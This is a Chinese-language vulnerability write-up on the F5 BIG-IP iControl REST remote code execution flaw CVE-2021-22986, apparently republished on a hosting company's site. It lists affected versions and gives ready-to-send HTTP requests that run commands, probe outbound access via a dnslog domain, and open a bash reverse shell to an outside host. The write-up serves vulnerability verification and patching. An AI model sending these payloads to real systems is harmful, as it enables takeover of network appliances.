您好,登錄后才能下訂單哦!
F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。
F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。
2021 年3月10日,F5官方發布安全通告,安全更新包含了影響F5的BIG-IP,BIG-IQ設備的多個高危漏洞,漏洞編號分別為CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986為F5 BIG-IP/IQ設備 iControl REST接口的未授權遠程代碼執行漏洞,漏洞評分9.8,評級嚴重。F5安全公告更新了BIG-IP,BIG-IQ中的多個嚴重漏洞。建議廣大用戶及時將f5 big-iq,f5 big-ip升級到最新版本,避免遭到攻擊。
BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0
部署安裝F5 BIG-IPV漏洞測試靶場環境。
1、訪問漏洞環境
2、POC驗證,進行命令執行操作
1.系統命令執行
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
2.通過dnslog探測是否可以出網
生成域名:zg8ie5.dnslog.cn
出網探測
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 62
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}
發現可以出網
3.通過bash反彈shell到vps
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 83
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}
漏洞驗證python腳本
https://github.com/PeiQi0/PeiQi-WIKI-POC
升級到最新版本
關于F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。